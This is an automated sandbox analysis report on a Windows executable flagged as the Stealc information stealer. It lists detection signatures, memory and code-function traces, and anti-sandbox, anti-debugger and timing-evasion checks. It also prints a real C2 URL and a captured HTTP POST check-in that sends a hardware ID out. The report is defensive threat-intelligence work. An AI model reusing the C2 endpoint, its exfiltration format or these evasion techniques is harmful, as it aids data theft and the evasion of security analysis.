Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1525381
MD5:93db12453ac29ad390cbd66f4b6dfd52
SHA1:14dc9072be488c339f9c2bbc3711d9793bb7218b
SHA256:afd87eeb51cb2bd9ed4b52f0151ddf1f540d6c9fffb433eab0063c7edf1d093f
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 6756 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 93DB12453AC29AD390CBD66F4B6DFD52)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000003.1746371608.0000000005000000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000002.1787435060.000000000142E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 6756JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 6756JoeSecurity_StealcYara detected StealcJoe Security

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.file.exe.630000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-04T04:41:07.170847+020020442431Malware Command and Control Activity Detected192.168.2.449730185.215.113.3780TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: file.exeAvira: detected
                Antivirus detection for URL or domain
                Source: http://185.215.113.37/URL Reputation: Label: malware
                Source: http://185.215.113.37URL Reputation: Label: malware
                Source: http://185.215.113.37/e2b1563c6670f193.phpURL Reputation: Label: malware
                Found malware configuration
                Source: 0.2.file.exe.630000.0.unpackMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
                Multi AV Scanner detection for domain / URL
                Source: http://185.215.113.37/wsVirustotal: Detection: 16%Perma Link
                Source: http://185.215.113.37/e2b1563c6670f193.phpOVirustotal: Detection: 16%Perma Link
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: file.exeJoe Sandbox ML: detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0063C820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,0_2_0063C820
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00637240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00637240
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00639AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00639AC0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00639B60 CryptUnprotectData,LocalAlloc,LocalFree,0_2_00639B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00648EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_00648EA0
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006438B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_006438B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00644910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00644910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0063DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0063DA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0063E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0063E430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00644570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00644570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0063ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0063ED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0063BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0063BE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0063DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0063DE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006316D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_006316D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00643EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00643EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0063F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0063F6B0

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 185.215.113.37:80
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: http://185.215.113.37/e2b1563c6670f193.php
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BKKFHIEGDHJKECAAKKEBHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 4b 4b 46 48 49 45 47 44 48 4a 4b 45 43 41 41 4b 4b 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 39 34 34 41 32 33 39 43 45 32 32 32 38 33 38 34 32 30 38 31 30 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4b 46 48 49 45 47 44 48 4a 4b 45 43 41 41 4b 4b 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4b 46 48 49 45 47 44 48 4a 4b 45 43 41 41 4b 4b 45 42 2d 2d 0d 0a Data Ascii: ------BKKFHIEGDHJKECAAKKEBContent-Disposition: form-data; name="hwid"B944A239CE222838420810------BKKFHIEGDHJKECAAKKEBContent-Disposition: form-data; name="build"doma------BKKFHIEGDHJKECAAKKEB--
                Source: Joe Sandbox ViewIP Address: 185.215.113.37 185.215.113.37
                Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00634880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_00634880
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: unknownHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BKKFHIEGDHJKECAAKKEBHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 4b 4b 46 48 49 45 47 44 48 4a 4b 45 43 41 41 4b 4b 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 39 34 34 41 32 33 39 43 45 32 32 32 38 33 38 34 32 30 38 31 30 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4b 46 48 49 45 47 44 48 4a 4b 45 43 41 41 4b 4b 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4b 46 48 49 45 47 44 48 4a 4b 45 43 41 41 4b 4b 45 42 2d 2d 0d 0a Data Ascii: ------BKKFHIEGDHJKECAAKKEBContent-Disposition: form-data; name="hwid"B944A239CE222838420810------BKKFHIEGDHJKECAAKKEBContent-Disposition: form-data; name="build"doma------BKKFHIEGDHJKECAAKKEB--
                Source: file.exe, 00000000.00000002.1787435060.000000000142E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37
                Source: file.exe, 00000000.00000002.1787435060.0000000001488000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/
                Source: file.exe, 00000000.00000002.1787435060.0000000001473000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1787435060.0000000001488000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
                Source: file.exe, 00000000.00000002.1787435060.0000000001488000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpO
                Source: file.exe, 00000000.00000002.1787435060.0000000001488000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/ws
                Source: file.exe, 00000000.00000002.1787435060.000000000142E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37t

                System Summary

                barindex
                PE file contains section with special chars
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009838C90_2_009838C9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AEF9090_2_00AEF909
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009542AA0_2_009542AA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A06A7F0_2_00A06A7F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A033E80_2_00A033E8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0096C3F80_2_0096C3F8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00990B300_2_00990B30
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00910B7C0_2_00910B7C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009FFD8E0_2_009FFD8E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A085CE0_2_00A085CE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00908ED10_2_00908ED1
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 006345C0 appears 316 times
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exeStatic PE information: Section: bgdhafsv ZLIB complexity 0.9946423668963951
                Source: file.exeStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
                Source: file.exe, 00000000.00000003.1746371608.0000000005000000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1786637155.0000000000631000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
                Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00649600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00649600
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00643720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_00643720
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\7YVTSJKY.htmJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                Source: file.exeStatic file information: File size 1846272 > 1048576
                Source: file.exeStatic PE information: Raw size of bgdhafsv is bigger than: 0x100000 < 0x19ca00

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.630000.0.unpack :EW;.rsrc :W;.idata :W; :EW;bgdhafsv:EW;xszuyfga:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;bgdhafsv:EW;xszuyfga:EW;.taggant:EW;
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00649860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00649860
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: file.exeStatic PE information: real checksum: 0x1cc866 should be: 0x1c4a27
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: bgdhafsv
                Source: file.exeStatic PE information: section name: xszuyfga
                Source: file.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ADD8E9 push 73CC9732h; mov dword ptr [esp], edi0_2_00ADD923
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ADD8E9 push 67787732h; mov dword ptr [esp], edx0_2_00ADD954
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A0F8E8 push 0061FAD4h; mov dword ptr [esp], edx0_2_00A0F8F6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009838C9 push 26C3E101h; mov dword ptr [esp], ebx0_2_009838D1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009838C9 push 7D622260h; mov dword ptr [esp], edx0_2_00983950
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009838C9 push ecx; mov dword ptr [esp], esp0_2_00983954
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009838C9 push edx; mov dword ptr [esp], ecx0_2_0098398D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0064B035 push ecx; ret 0_2_0064B048
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AA38F2 push eax; mov dword ptr [esp], 7BD7FC97h0_2_00AA392C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AA38F2 push edx; mov dword ptr [esp], 7FBFC220h0_2_00AA3958
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AA38F2 push 76534052h; mov dword ptr [esp], ebp0_2_00AA39A7
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A9480C push 5CFD2E90h; mov dword ptr [esp], esi0_2_00A94877
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A91017 push 60B77DDBh; mov dword ptr [esp], ebp0_2_00A90F42
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A91017 push ebp; mov dword ptr [esp], 7D6A1ABEh0_2_00A910BF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A91017 push 4403200Bh; mov dword ptr [esp], edi0_2_00A910D4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008E3031 push ebp; mov dword ptr [esp], edx0_2_008E308B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AA41AB push ecx; mov dword ptr [esp], 7FBDB95Ch0_2_00AA413D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A781A4 push eax; mov dword ptr [esp], 6D3A9306h0_2_00A781E0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A781A4 push edi; mov dword ptr [esp], ecx0_2_00A78265
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A291A7 push edi; mov dword ptr [esp], 5E2ED3E8h0_2_00A291E4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AB59B5 push 298F2091h; mov dword ptr [esp], ecx0_2_00AB59BD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AD798D push 2A4F7AD5h; mov dword ptr [esp], ebx0_2_00AD7DB6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AE418C push eax; mov dword ptr [esp], 7E73E567h0_2_00AE41AB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AE418C push 14894D19h; mov dword ptr [esp], ebp0_2_00AE424B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A74992 push ebx; mov dword ptr [esp], ebp0_2_00A749DB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ABC1F4 push 541CEBF1h; mov dword ptr [esp], eax0_2_00ABC20C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ABC1F4 push eax; mov dword ptr [esp], ecx0_2_00ABC213
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ABC1F4 push 6B1CD144h; mov dword ptr [esp], ebp0_2_00ABC226
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CC91B8 push edi; mov dword ptr [esp], esp0_2_00CC91C8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CC91B8 push edx; mov dword ptr [esp], ecx0_2_00CC91D9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00CC91B8 push 26F3C893h; mov dword ptr [esp], edx0_2_00CC91E7
                Source: file.exeStatic PE information: section name: bgdhafsv entropy: 7.952703648524724

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00649860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00649860

                Malware Analysis System Evasion

                barindex
                Found evasive API chain (may stop execution after checking locale)
                Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-13444
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0E476 second address: A0E47B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0DAA5 second address: A0DAAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0DAAF second address: A0DAB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0DC2F second address: A0DC3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FB9C8FCBE96h 0x0000000a pop ebx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0DC3A second address: A0DC4C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edi 0x00000006 pop edi 0x00000007 popad 0x00000008 jo 00007FB9C8FCDCAEh 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A0DDE6 second address: A0DDEA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A10B66 second address: A10BD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FB9C8FCDCA6h 0x0000000a popad 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f pushad 0x00000010 pushad 0x00000011 jmp 00007FB9C8FCDCB0h 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 jnl 00007FB9C8FCDCB6h 0x0000001f jmp 00007FB9C8FCDCB0h 0x00000024 popad 0x00000025 mov eax, dword ptr [eax] 0x00000027 jmp 00007FB9C8FCDCB1h 0x0000002c mov dword ptr [esp+04h], eax 0x00000030 push eax 0x00000031 push edx 0x00000032 pushad 0x00000033 pushad 0x00000034 popad 0x00000035 jmp 00007FB9C8FCDCB4h 0x0000003a popad 0x0000003b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A10C2A second address: A10C48 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB9C8FCBE9Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jl 00007FB9C8FCBE98h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A10C48 second address: A10C4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
